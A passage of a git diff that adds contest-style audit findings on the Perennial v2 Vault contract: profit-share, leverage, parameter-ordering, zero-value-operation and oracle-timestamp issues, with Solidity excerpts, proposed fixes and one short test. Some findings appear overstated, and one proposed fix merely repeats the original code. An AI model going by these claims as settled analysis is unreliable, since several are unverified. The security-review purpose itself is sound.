+In this case, we hit the `0/0` condition in `unsafeDiv`, which returns `ONE` (1e6 in Fixed6 representation). 
This means: +- `redemptionEligible.mul(ONE)` equals `redemptionEligible` +- So we're incorrectly marking the full `redemptionEligible` amount as ineligible for allocation +- When in reality, with no shares and no redemptions, none of the collateral should be reserved for redemptions + +The current fallback to `ONE` effectively reserves 100% of redeemable collateral even when there are no redemptions pending, which is overly conservative and could unnecessarily restrict capital efficiency. + +## Fix +A more capital efficient approach would be to explicitly handle this edge case: + +```solidity +function _ineligible(Context memory context, UFixed6 deposit, UFixed6 withdrawal) private pure returns (UFixed6) { + UFixed6 redemptionEligible = UFixed6Lib.unsafeFrom(context.totalCollateral) + .unsafeSub(context.global.assets.add(withdrawal)) + .unsafeSub(context.global.deposit.sub(deposit)); + + // If there are no redemptions, don't reserve any collateral regardless of shares + if (context.global.redemption.isZero()) return context.global.assets; + + return redemptionEligible + .mul(context.global.redemption) + .unsafeDiv(context.global.shares.add(context.global.redemption)) + .add(context.global.assets); +} +``` \ No newline at end of file diff --git a/043.md b/043.md new file mode 100644 index 0000000..7762cd3 --- /dev/null +++ b/043.md @@ -0,0 +1,107 @@ +Cheerful Taffy Dolphin + +Medium + +# Stale Parameter Usage in Rebalance Causes Incorrect Position Sizing and Risk Management Failures + +## Summary + +The Vault contract contains a significant timing vulnerability in its parameter update mechanism that could result in incorrect market positions, financial loss, and state inconsistency. When updating vault parameters (maxDeposit, minDeposit, profitShare), the rebalancing operation executes using outdated parameters before the new values are stored, leading to incorrect position sizing and potential violations of intended risk constraints. 
+ +Parameter Update: + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L241 + +```solidity +function updateParameter(VaultParameter memory newParameter) external onlyOwner { + rebalance(address(0)); // Critical timing issue here + _updateParameter(newParameter); +} +``` + +Context Loading with Old Parameters: +```solidity +function _loadContext(address account) private view returns (Context memory context) { + context.parameter = _parameter.read(); // Loads old parameters + // ... loads rest of context +} +``` + +Parameter Usage in Core Operations: +```solidity +function _maxDeposit(Context memory context) private view returns (UFixed6) { + return context.latestCheckpoint.unhealthy() ? + UFixed6Lib.ZERO : + context.parameter.maxDeposit.unsafeSub(UFixed6Lib.unsafeFrom(totalAssets()).add(context.global.deposit)); +} +``` + +The issue is that rebalancing executes a full market position adjustment using the old parameter values. This means: + +1. The `maxDeposit` calculation during rebalance uses outdated deposit limits +2. The `_strategy()` function (which is called by `_manage()` during rebalance) bases its allocation decisions on old parameters +3. If the new parameters significantly change deposit limits or other constraints, the rebalance could set positions that immediately violate the new parameters +4. Market positions set during rebalance might need immediate readjustment after the parameter update, causing unnecessary gas costs and potential market impact + +This is particularly problematic in scenarios where parameter updates are specifically intended to adjust risk parameters or position limits in response to market conditions. + +## Impact +The parameter update timing issue creates critical failure modes in the vault's market management. 
The vault executes rebalancing operations using stale parameter values, which manifests in multiple levels of technical failures: + +At the position management level, all market orders during rebalance are sized according to outdated maxDeposit and strategy parameters, leading to incorrect leverage ratios and position sizes that violate the intended new risk parameters. For instance, if maxDeposit is being lowered from 1000 to 500, the rebalance will still execute positions sized for the 1000 limit. + +These incorrectly sized positions trigger state inconsistencies where the vault's market exposure directly conflicts with its stored parameters. This forces additional transactions to realign positions, introducing unnecessary gas costs and potential sandwich attack vectors during the corrective operations. + +This breaks the vault's risk management guarantees. When parameter updates are made in response to market conditions (e.g., reducing maxDeposit during high volatility), the delay in parameter application means the vault continues to operate at higher risk levels during the rebalance - precisely when risk management is most crucial. 
+ +## Fix + +Modify the `updateParameter` function to handle parameters before rebalancing: + +```solidity +function updateParameter(VaultParameter memory newParameter) external onlyOwner { + // Store new parameters first + _updateParameter(newParameter); + + // Rebalance with new parameters + rebalance(address(0)); +} +``` + +Ensure state consistency in `_loadContext`: + +```solidity +function _loadContext(address account) private view returns (Context memory context) { + // Load latest parameters first to ensure all subsequent calculations use new values + context.parameter = _parameter.read(); + + // Load market state + context.latestTimestamp = type(uint256).max; + context.currentTimestamp = type(uint256).max; + context.registrations = new Registration[](totalMarkets); + context.collaterals = new Fixed6[](totalMarkets); + + // ... rest of context loading +} +``` + +And add validation in `_updateParameter`: + +```solidity +function _updateParameter(VaultParameter memory newParameter) private { + // Validate parameters + VaultParameter memory oldParameter = _parameter.read(); + + // If reducing maxDeposit, verify current deposits don't exceed new limit + if (newParameter.maxDeposit.lt(oldParameter.maxDeposit)) { + if (UFixed6Lib.unsafeFrom(totalAssets()).gt(newParameter.maxDeposit)) + revert VaultParameterStorageInvalidError(); + } + + // Store and emit + _parameter.store(newParameter); + emit ParameterUpdated(newParameter); +} +``` + +The rebalance will now use the new parameters for all calculations and position adjustments, ensuring proper risk management and position sizing. 
\ No newline at end of file diff --git a/044.md b/044.md new file mode 100644 index 0000000..8417717 --- /dev/null +++ b/044.md @@ -0,0 +1,142 @@ +Cheerful Taffy Dolphin + +Medium + +# Incorrect Profit Share Distribution Due to Asset-Share Ratio Manipulation in Checkpoint Calculations + +## Summary +The vault's checkpoint mechanism contains a sequence vulnerability in its profit share calculations that affects coordinator compensation. The vulnerability originates in the vault's settlement flow, where `_settle()` triggers checkpoint completion and propagates through to profit distribution: + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L374 + +```solidity +function _settle(Context memory context, address account) private { + // ... settlement logic ... + (context.mark, profitShares) = nextCheckpoint.complete( + context.mark, + context.parameter, + _checkpointAtId(context, nextCheckpoint.timestamp) + ); + context.global.shares = context.global.shares.add(profitShares); + _credit(coordinator, profitShares); +} +``` + +The current checkpoint-completion implementation updates assets before calculating profit shares, but only adds the profit shares to the total share count afterwards. This creates a calculation using inconsistent state - new assets but old shares - leading to skewed profit distributions. The issue is particularly significant because it directly impacts the economic incentives of the vault coordinator role, potentially over- or under-allocating profit shares during each checkpoint period based on mismatched asset-to-share ratios. 
+ + +```solidity +function complete(Checkpoint memory self, UFixed18 mark, VaultParameter memory parameter, PerennialCheckpoint memory marketCheckpoint) internal pure returns (UFixed18 newMark, UFixed6 profitShares) { + // First adds new collateral to assets + self.assets = self.assets.add(marketCheckpoint.collateral); + + // Then calculates profit share using updated assets but old shares + (newMark, profitShares) = _calculateProfitShare(self, mark, parameter); + + // Finally updates shares after profit calculation + self.shares = self.shares.add(profitShares); +} +``` + + +```solidity +function _calculateProfitShare(Checkpoint memory self, UFixed18 mark, VaultParameter memory parameter) private pure { + // Uses current assets with old shares for calculation + newMark = mark.max(UFixed18Lib.from(UFixed6Lib.unsafeFrom(self.assets)).div(UFixed18Lib.from(self.shares))); + + // Calculates profit based on potentially incorrect mark + UFixed6 profitAssets = parameter.profitShare.mul(UFixed6Lib.from(newMark.sub(mark).mul(UFixed18Lib.from(self.shares)))); + + // Calculates shares based on skewed ratio + profitShares = profitAssets.mul(self.shares).div(UFixed6Lib.unsafeFrom(self.assets).sub(profitAssets)); +} +``` + +```solidity +// Account processing that interacts with checkpoint +function processGlobal(Account memory self, uint256 latestId, Checkpoint memory checkpoint, UFixed6 deposit, UFixed6 redemption) internal pure { + self.latest = latestId; + (self.assets, self.shares) = ( + self.assets.add(checkpoint.toAssetsGlobal(redemption)), + self.shares.add(checkpoint.toSharesGlobal(deposit)) + ); + // ... +} +``` + +The critical issue lies in the calculation sequence where new assets are factored into profit calculations before the share total is updated. This creates a momentary skew in the assets-to-shares ratio that affects profit distribution. 
While this skew corrects itself in the next checkpoint, it means the coordinator's profit share for that period is calculated against an artificially inflated asset base without corresponding share adjustments. + +The vulnerability is exacerbated by the interaction between checkpoint completion and account processing, where profit share calculations occur with inconsistent state before the account system can properly process and update share totals. + +## Impact +The improper sequencing in checkpoint profit share calculations has direct financial implications on vault economics. When the vault calculates coordinator profit shares using updated asset values but stale share counts, it skews the assets-to-shares ratio used for profit allocation. + +For example, if a checkpoint adds 1000 USDC in new assets before calculating profits on an existing 10000 USDC / 10000 shares (1:1 ratio), but the new assets should have minted 1000 new shares, the calculation uses an incorrect 11000:10000 ratio instead of the proper 11000:11000. With a 20% profit share parameter, this inflated ratio results in the coordinator receiving more profit shares than intended. + +This miscalculation compounds if the vault frequently adds large amounts of collateral relative to its size. While the impact is bounded by the checkpoint period and corrects in subsequent checkpoints, it creates unfair profit distributions and could be exploited by coordinators timing their actions around checkpoint boundaries to maximize profit share allocations. + +The issue is worsened by the vault's account management system where checkpoint state influences share calculations in processGlobal. When assets are updated before profit calculation but shares are handled afterward, it creates a discrepancy that propagates through the account processing system, leading to incorrect share allocations at the account level. 
+ +## Fix + +First fix the ordering issue in `complete`: +```solidity +function complete( + Checkpoint memory self, + UFixed18 mark, + VaultParameter memory parameter, + PerennialCheckpoint memory marketCheckpoint +) internal pure returns (UFixed18 newMark, UFixed6 profitShares) { + // Store original state before any updates + Fixed6 originalAssets = self.assets; + + // Update collateral/assets + self.assets = self.assets.add(marketCheckpoint.collateral); + + // Calculate profit shares using original asset state + (newMark, profitShares) = _calculateProfitShare( + originalAssets, + self.shares, + self.assets, + mark, + parameter + ); + + // Add profit shares after calculation + self.shares = self.shares.add(profitShares); + + // Add fees last + self.tradeFee = marketCheckpoint.tradeFee; + self.settlementFee = marketCheckpoint.settlementFee; +} +``` + +Update profit calculation to handle states correctly: +```solidity +function _calculateProfitShare( + Fixed6 originalAssets, + UFixed6 currentShares, + Fixed6 newAssets, + UFixed18 mark, + VaultParameter memory parameter +) private pure returns (UFixed18 newMark, UFixed6 profitShares) { + // Skip calculation for fresh vaults + if (currentShares.isZero()) return (UFixed18Lib.ONE, UFixed6Lib.ZERO); + + // Calculate new mark using original assets to avoid inflated mark + newMark = mark.max(UFixed18Lib.from(UFixed6Lib.unsafeFrom(originalAssets)).div(UFixed18Lib.from(currentShares))); + + // Skip if no previous mark (migration case) + if (mark.isZero()) return (newMark, UFixed6Lib.ZERO); + + // Calculate profit using state-consistent ratio + UFixed6 profitAssets = parameter.profitShare + .mul(UFixed6Lib.from(newMark.sub(mark).mul(UFixed18Lib.from(currentShares)))); + + // Skip if no assets to allocate + if (UFixed6Lib.unsafeFrom(newAssets).sub(profitAssets).isZero()) return (newMark, UFixed6Lib.ZERO); + + // Calculate shares using new assets + profitShares = 
profitAssets.mul(currentShares).div(UFixed6Lib.unsafeFrom(newAssets).sub(profitAssets)); +} +``` \ No newline at end of file diff --git a/045.md b/045.md new file mode 100644 index 0000000..a5094de --- /dev/null +++ b/045.md @@ -0,0 +1,61 @@ +Cheerful Taffy Dolphin + +Medium + +# Lack of LEVERAGE_BUFFER Check in updateLeverage() Causes Position Operations to Revert Due to Storage-Execution Mismatch + +## Description +The updateLeverage function in Vault.sol allows setting leverage values without validating against the LEVERAGE_BUFFER constraint (1.2e6) defined in MakerStrategyLib.sol. While MakerStrategyLib enforces this constraint during strategy execution, the lack of validation at the leverage update level creates a potential mismatch between stored leverage values and what can be safely executed. + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L215 + +```solidity +// Vault.sol +function updateLeverage(uint256 marketId, UFixed6 newLeverage) external onlyOwner { + rebalance(address(0)); + if (marketId >= totalMarkets) revert VaultMarketDoesNotExistError(); + _updateMarket(marketId, UFixed6Lib.MAX, newLeverage); +} +``` + +```solidity +// MakerStrategyLib.sol +UFixed6 public constant LEVERAGE_BUFFER = UFixed6.wrap(1.2e6); + +function _allocateMarket(...) private pure returns (Target memory target, UFixed6 marketCollateral) { + marketCollateral = marketContext.margin + .add(collateral.sub(totalMargin).mul(marketContext.registration.weight)); + + // LEVERAGE_BUFFER enforcement + UFixed6 marketAssets = assets + .mul(marketContext.registration.weight) + .min(marketCollateral.mul(LEVERAGE_BUFFER)); +} +``` + +## Scenario: +1. Owner calls updateLeverage with a leverage value > 1.2e6 +2. The update succeeds and stores the high leverage value +3. When strategy executes, operations fail due to LEVERAGE_BUFFER check in MakerStrategyLib +4. 
Results in positions that cannot be properly adjusted + + +## Impact +When updateLeverage() allows setting leverage values above LEVERAGE_BUFFER (1.2e6), it creates a critical state inconsistency since MakerStrategyLib.allocate() enforces this limit during position calculations and strategy execution. This leads to a scenario where the stored leverage value in Registration.leverage is higher than what allocate() will allow during position adjustments, causing allocate() to calculate invalid position sizes based on unusable leverage values + +Subsequent calls to update() or rebalance() will fail when MakerStrategyLib attempts to execute positions with the stored leverage, as the calculations in _allocateMarket() involving marketContext.registration.leverage will exceed LEVERAGE_BUFFER constraints. + +This temporarily locks vault funds in existing positions, as any attempt to modify positions through the strategy will revert due to the leverage mismatch between storage and execution constraints - until an owner updates the leverage to a value within LEVERAGE_BUFFER limits. + + + +## Recommendation +Add validation in updateLeverage to enforce the LEVERAGE_BUFFER constraint: +```solidity +function updateLeverage(uint256 marketId, UFixed6 newLeverage) external onlyOwner { + rebalance(address(0)); + if (marketId >= totalMarkets) revert VaultMarketDoesNotExistError(); + if (newLeverage.gt(LEVERAGE_BUFFER)) revert InvalidLeverageError(); + _updateMarket(marketId, UFixed6Lib.MAX, newLeverage); +} +``` diff --git a/046.md b/046.md new file mode 100644 index 0000000..be2b721 --- /dev/null +++ b/046.md @@ -0,0 +1,98 @@ +Cheerful Taffy Dolphin + +Medium + +# Missing Position Size Validation in updateLeverage() Causes Forced Position Adjustments Across Pooled Vault Assets + +## Description +The updateLeverage function in Vault.sol calls rebalance(address(0)) but does not validate whether positions would remain valid under the new leverage settings. 
While rebalance settles current positions, it does not verify if those positions would be safely maintainable under the new leverage value. + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L215 + +```solidity +// Vault.sol +function updateLeverage(uint256 marketId, UFixed6 newLeverage) external onlyOwner { + rebalance(address(0)); // Settles but doesn't validate future position validity + if (marketId >= totalMarkets) revert VaultMarketDoesNotExistError(); + _updateMarket(marketId, UFixed6Lib.MAX, newLeverage); +} +``` + +```solidity +// MakerStrategyLib.sol +function _allocateMarket( + MarketMakerStrategyContext memory marketContext, + UFixed6 totalMargin, + UFixed6 collateral, + UFixed6 assets +) private pure returns (Target memory target, UFixed6 marketCollateral) { + // Position calculations depend on leverage + UFixed6 minAssets = marketContext.riskParameter.minMargin + .unsafeDiv(marketContext.registration.leverage.mul(marketContext.riskParameter.maintenance)); + // ... +} +``` + +## Impact + +When a new leverage value is set, the positions held in marketContext.currentAccountPosition are immediately subjected to different minAssets calculations in _allocateMarket(), where newMinAssets = marketContext.riskParameter.minMargin.unsafeDiv(newLeverage.mul(marketContext.riskParameter.maintenance)) + +This causes existing maker positions to become misaligned with market risk parameters since _allocateMarket() will calculate new collateral requirements against these positions using the updated leverage value, potentially pushing them below minPosition or above maxPosition bounds. + +The next call to rebalance() or update() will attempt to force adjust these positions through MakerStrategyLib.allocate(), as the strategy recalculates targets based on the new leverage parameters without consideration for position size transitions. 
+ +Since the vault manages pooled positions, any forced adjustments affect all users' proportional share of the vault's total assets, as position modifications are executed at the vault level rather than per individual deposit. + +## Recommendation: + +Add a validation function to `MakerStrategyLib.sol`: +```solidity +/// @notice Validates if positions would remain valid under new leverage +/// @param registrations Current market registrations array +/// @param marketId Market to validate +/// @param newLeverage Proposed new leverage value +/// @return isValid True if positions would remain valid under new leverage +function validatePositionsForLeverage( + Registration[] memory registrations, + uint256 marketId, + UFixed6 newLeverage +) public view returns (bool isValid) { + MarketMakerStrategyContext memory marketContext = _loadContext(registrations[marketId]); + + // Skip validation if no current position + if (marketContext.currentAccountPosition.maker.isZero()) return true; + + // Calculate minimum required assets with new leverage + UFixed6 newMinAssets = marketContext.riskParameter.minMargin + .unsafeDiv(newLeverage.mul(marketContext.riskParameter.maintenance)); + + // Check if current positions would remain valid + UFixed6 newPositionTarget = newMinAssets + .muldiv(newLeverage, marketContext.latestPrice.abs()); + + return newPositionTarget.gte(marketContext.minPosition) && + newPositionTarget.lte(marketContext.maxPosition); +} +``` + +Modify `Vault.sol` updateLeverage function: +```solidity +error InvalidPositionLeverageError(); + +function updateLeverage(uint256 marketId, UFixed6 newLeverage) external onlyOwner { + rebalance(address(0)); + if (marketId >= totalMarkets) revert VaultMarketDoesNotExistError(); + + // Build registrations array for validation + Registration[] memory registrations = new Registration[](totalMarkets); + for (uint256 i = 0; i < totalMarkets; i++) { + registrations[i] = _registrations[i].read(); + } + + // Validate positions would 
remain valid with new leverage
+    if (!MakerStrategyLib.validatePositionsForLeverage(registrations, marketId, newLeverage)) 
+        revert InvalidPositionLeverageError();
+        
+    _updateMarket(marketId, UFixed6Lib.MAX, newLeverage);
+}
+```
diff --git a/047.md b/047.md new file mode 100644 index 0000000..8af4f2e --- /dev/null +++ b/047.md @@ -0,0 +1,102 @@ +Cheerful Taffy Dolphin + +Medium + +# Vault Profit Share Bypass During Migration Results in Permanent Revenue Loss Through Zero-Mark Condition + +## Summary +A critical vulnerability exists in the `_calculateProfitShare` function where profit shares are not allocated when the high-water mark (`mark`) is zero, resulting in potential economic loss during vault migrations. + +When the `mark` parameter is zero (typical during vault migration), the function prematurely returns after calculating `newMark` but before computing profit shares. This bypasses the profit share calculation entirely, even though there may be legitimate profits to distribute. + + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/types/Checkpoint.sol#L119 + +```solidity +function _calculateProfitShare( + Checkpoint memory self, + UFixed18 mark, + VaultParameter memory parameter +) private pure returns (UFixed18 newMark, UFixed6 profitShares) { + if (self.shares.isZero()) return (UFixed18Lib.ONE, UFixed6Lib.ZERO); + + newMark = mark.max(UFixed18Lib.from(UFixed6Lib.unsafeFrom(self.assets)) + .div(UFixed18Lib.from(self.shares))); + + // Bug: Early return skips profit share calculation + if (mark.isZero()) return (newMark, UFixed6Lib.ZERO); + + // Never reaches this code when mark is zero + UFixed6 profitAssets = parameter.profitShare + .mul(UFixed6Lib.from(newMark.sub(mark).mul(UFixed18Lib.from(self.shares)))); +} +``` + +### Scenario + +```solidity +Initial State: +- self.shares = 1000 +- self.assets = 1500 +- parameter.profitShare = 0.2 (20%) +- mark = 0 + +Expected Calculation: +1. 
newMark = 1.5 +2. profitAssets = 0.2 * (1.5 - 0) * 1000 = 300 +3. profitShares = (300 * 1000) / (1500 - 300) = 250 + +Actual Result: +- Returns (1.5, 0) +- 250 profit shares worth 300 assets are not allocated +``` + +### Impact +The zero-mark condition triggers a complete bypass of profit share calculation during migration, nullifying the coordinator's claim to a 20% share of vault performance. When initial depositors enter at mark=0, their returns above the zero-mark are excluded from profit share computations, compounding into a permanent revenue loss at the protocol level. This calculation bypass effectively breaks the vault's core economic incentive mechanism by allowing value accrual without corresponding profit share minting. + +## Proof of Concept +```solidity +function testMigrationProfitShareBug() public { + Checkpoint memory checkpoint; + checkpoint.shares = UFixed6.wrap(1000e6); + checkpoint.assets = Fixed6.wrap(1500e6); + + VaultParameter memory param; + param.profitShare = UFixed6.wrap(0.2e6); // 20% + + UFixed18 mark = UFixed18.wrap(0); + + (UFixed18 newMark, UFixed6 profitShares) = + checkpoint._calculateProfitShare(mark, param); + + // profitShares is 0 when it should be ~250e6 + assert(profitShares.isZero()); +} +``` + +## Recommended Fix +```solidity +function _calculateProfitShare( + Checkpoint memory self, + UFixed18 mark, + VaultParameter memory parameter +) private pure returns (UFixed18 newMark, UFixed6 profitShares) { + if (self.shares.isZero()) return (UFixed18Lib.ONE, UFixed6Lib.ZERO); + + newMark = mark.max(UFixed18Lib.from(UFixed6Lib.unsafeFrom(self.assets)) + .div(UFixed18Lib.from(self.shares))); + + // Calculate profits even when mark is zero + UFixed6 profitAssets = parameter.profitShare + .mul(UFixed6Lib.from(newMark.sub(mark).mul(UFixed18Lib.from(self.shares)))); + + if (UFixed6Lib.unsafeFrom(self.assets).sub(profitAssets).isZero()) + return (newMark, UFixed6Lib.ZERO); + + profitShares = profitAssets.mul(self.shares) + 
.div(UFixed6Lib.unsafeFrom(self.assets).sub(profitAssets)); + + return (newMark, profitShares); +} +``` + diff --git a/048.md b/048.md new file mode 100644 index 0000000..3dca462 --- /dev/null +++ b/048.md @@ -0,0 +1,146 @@ +Cheerful Taffy Dolphin + +Medium + +# Zero-Value Operation Bypass in Vault Update Function Enables Economic Manipulation Through Artificial Checkpoint Creation + +## Summary + +A critical vulnerability has been identified in Perennial V2's Vault implementation that allows manipulation of core economic mechanisms through zero-value operations. The vulnerability exists in the vault's `_update()` function, which manages deposits, redemptions, and claims. While the function implements checks for minimum deposits and single-sided operations, it fails to properly validate zero-value state transitions. This oversight allows an attacker to influence share price calculations, manipulate loss socialization, and force unnecessary market interactions—all without committing economic value to the system. + +The severity of this issue is amplified by the vault's role as a core capital management component of the Perennial V2 protocol, directly affecting user funds and protocol stability. The primary risk lies in the manipulation of profit distribution and performance metrics, potentially impacting all vault participants through degraded price discovery and increased operational costs. 
+ +The `_update()` function's validation sequence creates a critical flaw in the vault's economic safeguards by failing to properly validate zero-value operations: + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L331 + +```solidity +function _update(Context memory context, address account, UFixed6 depositAssets, UFixed6 redeemShares, UFixed6 claimAssets) private { + if (!depositAssets.isZero() && depositAssets.lt(context.parameter.minDeposit)) + revert VaultInsufficientMinimumError(); +``` + +This validation structure allows zero-value operations to trigger legitimate state changes in both global and local contexts: + +```solidity +context.global.update(context.currentId, claimAssets, redeemShares, depositAssets, redeemShares); +context.local.update(context.currentId, claimAssets, redeemShares, depositAssets, redeemShares); +context.currentCheckpoint.update(depositAssets, redeemShares); +``` + +Each artificial state change cascades through the system, affecting profit calculations via the checkpoint mechanism: + +```solidity +(context.mark, profitShares) = nextCheckpoint.complete(mark, parameter, _checkpointAtId(timestamp)); +``` + +The impact amplifies when these state changes trigger unnecessary position adjustments: + +```solidity +_manage(context, depositAssets, claimAmount, !depositAssets.isZero() || !redeemShares.isZero()); +``` + +## Attack Surface + +The primary attack vector exploits checkpoint creation through zero-value operations to manipulate share pricing and profit distribution: + +```solidity +context.global.update(context.currentId, claimAssets, redeemShares, depositAssets, redeemShares); +context.local.update(context.currentId, claimAssets, redeemShares, depositAssets, redeemShares); +context.currentCheckpoint.update(depositAssets, redeemShares); +``` + +An attacker can front-run legitimate deposits by creating artificial checkpoints that affect the profit calculation 
mechanism. + +This manipulation affects both immediate share price calculations and long-term performance metrics through the high-water mark system. By strategically timing zero-value operations during price volatility, attackers can influence profit distribution and performance fee calculations. + +Artificial state changes affect loss socialization calculations: +```solidity +function _socialize(Context memory context, UFixed6 claimAssets) private pure { + return claimAssets.muldiv( + UFixed6Lib.unsafeFrom(context.totalCollateral).min(context.global.assets), + context.global.assets + ); +} +``` + +By submitting zero-value operations during high volatility, attackers can force recalculation of the socialization ratio. The denominator (context.global.assets) becomes vulnerable to manipulation through pending claims, affecting loss distribution across all vault participants. + +Market Position Griefing: + +```solidity +_manage(context, depositAssets, claimAmount, !depositAssets.isZero() || !redeemShares.isZero()); +``` + +Attackers can front-run significant market updates with zero-value operations that trigger unnecessary rebalancing. This causes: + +- Increased transaction costs through forced rebalancing +- Potential transaction failures from amplified slippage +- Price impact during market volatility + + +The vulnerability stems from a fundamental architectural flaw in the vault's state transition model. By placing economic validity checks after state transition logic, the system fails to distinguish between meaningful and artificial state changes. This architectural weakness transforms zero-value operations from administrative actions into vectors for economic exploitation. + +These design flaws allow an attacker to systematically degrade the vault's economic integrity through targeted zero-value operations, affecting share price discovery, loss socialization, and market position management. 
+ +## Fix +This fix prevents artificial checkpoint creation and ensures all operations have economic substance before affecting vault state. + +```solidity +function _update( + Context memory context, + address account, + UFixed6 depositAssets, + UFixed6 redeemShares, + UFixed6 claimAssets +) private { + // Magic value handling + if (claimAssets.eq(UFixed6Lib.MAX)) claimAssets = context.local.assets; + if (redeemShares.eq(UFixed6Lib.MAX)) redeemShares = context.local.shares; + + // Operator validation + if (msg.sender != account && !IVaultFactory(address(factory())).operators(account, msg.sender)) + revert VaultNotOperatorError(); + + // Validate meaningful operation first + if (depositAssets.isZero() && redeemShares.isZero() && claimAssets.isZero()) + revert VaultNoOperationError(); + + // Single-sided operation check + if (!depositAssets.add(redeemShares).add(claimAssets).eq(depositAssets.max(redeemShares).max(claimAssets))) + revert VaultNotSingleSidedError(); + + // Economic validation for non-zero operations + if (depositAssets.gt(UFixed6Lib.ZERO)) { + if (depositAssets.gt(_maxDeposit(context))) + revert VaultDepositLimitExceededError(); + if (depositAssets.lt(context.parameter.minDeposit)) + revert VaultInsufficientMinimumError(); + } + + if (redeemShares.gt(UFixed6Lib.ZERO)) { + if (context.latestCheckpoint.toAssets(redeemShares).lt(context.parameter.minDeposit)) + revert VaultInsufficientMinimumError(); + } + + if (context.local.current != context.local.latest) + revert VaultExistingOrderError(); + + // Process operations + UFixed6 claimAmount = _socialize(context, claimAssets); + + // Update positions + context.global.update(context.currentId, claimAssets, redeemShares, depositAssets, redeemShares); + context.local.update(context.currentId, claimAssets, redeemShares, depositAssets, redeemShares); + context.currentCheckpoint.update(depositAssets, redeemShares); + + // Manage assets + asset.pull(msg.sender, UFixed18Lib.from(depositAssets)); + 
_manage(context, depositAssets, claimAmount, !depositAssets.isZero() || !redeemShares.isZero()); + asset.push(msg.sender, UFixed18Lib.from(claimAmount)); + + emit Updated(msg.sender, account, context.currentId, depositAssets, redeemShares, claimAssets); +} + +error VaultNoOperationError(); +``` \ No newline at end of file diff --git a/049.md b/049.md new file mode 100644 index 0000000..16b817c --- /dev/null +++ b/049.md @@ -0,0 +1,56 @@ +Cheerful Taffy Dolphin + +Medium + +# Array Length Mismatch in Vault's _manage() Function Could Lead to Fund Loss via Invalid Position Management + +## Summary + +A critical vulnerability has been identified in the _manage function's memory handling. This function serves as the core mechanism for managing market positions and collateral allocation across registered markets. The vulnerability stems from unsafe array access patterns between the context's registrations and strategy-generated targets, potentially compromising the vault's financial operations and position management. + +The vulnerability centers on array length management between `context.registrations` and the `targets` array returned by the virtual `_strategy` function. In the current implementation: + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L434 + +```solidity +function _manage(Context memory context, UFixed6 deposit, UFixed6 withdrawal, bool shouldRebalance) private { + Target[] memory targets = _strategy(context, deposit, withdrawal, _ineligible(context, deposit, withdrawal)); + + for (uint256 marketId; marketId < context.registrations.length; marketId++) + if (targets[marketId].collateral.lt(Fixed6Lib.ZERO)) + _retarget(context.registrations[marketId], targets[marketId], shouldRebalance); +``` + +The core issue lies in the array access pattern where the loop iterates using `context.registrations.length` but accesses `targets[marketId]` without any length verification. 
Since `_strategy` is a virtual function, its implementation could return an array of any length, creating a critical mismatch. + +## Impact + +When `targets.length < context.registrations.length`, this leads to out-of-bounds access and potential contract reversion. Conversely, if `targets.length > context.registrations.length`, some target positions remain unprocessed, leading to incomplete strategy execution. + +The financial implications are severe – mismatched array lengths can result in incorrect position management, unbalanced collateral distribution, and potential fund loss through improper allocations. The system's risk management capabilities are compromised as market exposure becomes misaligned with intended strategy. + +## Fix + +Implement strict length validation: + +```solidity +function _manage(Context memory context, UFixed6 deposit, UFixed6 withdrawal, bool shouldRebalance) private { + Target[] memory targets = _strategy(context, deposit, withdrawal, _ineligible(context, deposit, withdrawal)); + require(targets.length == context.registrations.length, "Length mismatch"); + // ... 
existing logic +} +``` + +Alternatively, a more flexible approach using dynamic length handling: + +```solidity +function _manage(Context memory context, UFixed6 deposit, UFixed6 withdrawal, bool shouldRebalance) private { + Target[] memory targets = _strategy(context, deposit, withdrawal, _ineligible(context, deposit, withdrawal)); + require(targets.length <= context.registrations.length, "Too many targets"); + + for (uint256 marketId; marketId < targets.length; marketId++) { + if (targets[marketId].collateral.lt(Fixed6Lib.ZERO)) + _retarget(context.registrations[marketId], targets[marketId], shouldRebalance); + } +} +``` diff --git a/050.md b/050.md new file mode 100644 index 0000000..a080609 --- /dev/null +++ b/050.md @@ -0,0 +1,66 @@ +Cheerful Taffy Dolphin + +Medium + +# Minimum Oracle Timestamp Selection Leads to Price Staleness and Settlement Manipulation in Multi-Market Vault + +## Summary + +In multi-market vault systems, oracle timestamp synchronization is critical for maintaining accurate pricing, risk assessment, and settlement operations. The current implementation in the Vault contract uses a minimum timestamp strategy across all registered markets to coordinate oracle data. This architecture reveals significant vulnerabilities when examining the interaction between timestamp selection and core vault operations. + +The core vulnerability stems from the vault's timestamp selection mechanism: + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L511 + +```solidity +context.latestTimestamp = Math.min(context.latestTimestamp, oracleVersion.timestamp); +``` + +This design creates a cascading series of technical issues affecting critical vault operations. When processing oracle data, the vault forces synchronization to the oldest timestamp across all registered markets. 
Consider a scenario where Market A reports t=1000, Market B t=800, and Market C t=950 - the vault anchors all operations to t=800. + +The most immediate impact manifests in the settlement logic: +```solidity +while (context.global.current > context.global.latest && + context.latestTimestamp >= (nextCheckpoint = _checkpoints[context.global.latest + 1].read()).timestamp) +``` + +Here, the settlement pipeline stalls until all markets advance beyond the checkpoint timestamp. A malicious actor could exploit this by manipulating oracle update delays, effectively controlling the settlement cadence across all markets. + +This timestamp anchoring propagates into the risk management system through the strategy calculation: +```solidity +Target[] memory targets = _strategy(context, deposit, withdrawal, _ineligible(context, deposit, withdrawal)); +``` + +The vault calculates positions and collateral requirements using potentially stale price data, leading to mispriced risk. During high volatility periods, the price differential between current and stale markets creates arbitrage vectors. For example, with Market A at $100 (current) and Market B at $80 (stale), the vault operates with a 25% price discrepancy. + +The risk compounds in position management: +```solidity +registration.market.update( + address(this), + shouldRebalance ? target.maker : Fixed6Lib.ZERO, + shouldRebalance ? target.taker : Fixed6Lib.ZERO, + target.collateral, + address(0) +); 